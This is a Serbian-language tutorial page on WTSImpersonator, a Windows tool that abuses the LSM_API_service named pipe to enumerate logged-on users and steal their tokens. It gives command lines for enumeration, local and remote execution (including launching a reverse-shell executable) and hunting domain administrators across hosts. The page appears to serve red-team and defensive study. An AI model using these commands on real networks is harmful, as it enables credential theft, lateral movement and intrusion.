WTS Impersonator alat eksploatiše "\pipe\LSM_API_service" RPC Imenovani cev da neprimetno enumeriše prijavljene korisnike i preuzme njihove tokene, zaobilazeći tradicionalne tehnike impersonacije tokena. Ovaj pristup olakšava bezbolno lateralno kretanje unutar mreža. Inovacija iza ove tehnike pripisuje se Omri Baso-u, čiji rad je dostupan na GitHub-u.

Osnovna Funkcionalnost

Alat funkcioniše putem niza API poziva:

WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW

Ključni moduli i upotreba

• Enumeracija korisnika: Lokalna i udaljena enumeracija korisnika je moguća pomoću alata, korišćenjem komandi za oba scenarija:

• Lokalno:

.\WTSImpersonator.exe -m enum

• Udaljeno, navođenjem IP adrese ili imena računara:

.\WTSImpersonator.exe -m enum -s 192.168.40.131

• Izvršavanje komandi: Moduli exec i exec-remote zahtevaju Servisni kontekst da bi funkcionisali. Lokalno izvršavanje jednostavno zahteva izvršnu datoteku WTSImpersonator i komandu:

• Primer za lokalno izvršavanje komande:

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe

• Može se koristiti PsExec64.exe za dobijanje servisnog konteksta:

.\PsExec64.exe -accepteula -s cmd.exe

• Udaljeno izvršavanje komandi: Uključuje kreiranje i instaliranje servisa udaljeno slično kao PsExec.exe, omogućavajući izvršavanje sa odgovarajućim dozvolama.

• Primer udaljenog izvršavanja:

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2

• Modul za traženje korisnika: Cilja određene korisnike na više mašina, izvršavajući kod pod njihovim akreditacijama. Ovo je posebno korisno za ciljanje Administratora domena sa lokalnim administratorskim pravima na nekoliko sistema.

• Primer upotrebe:

.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe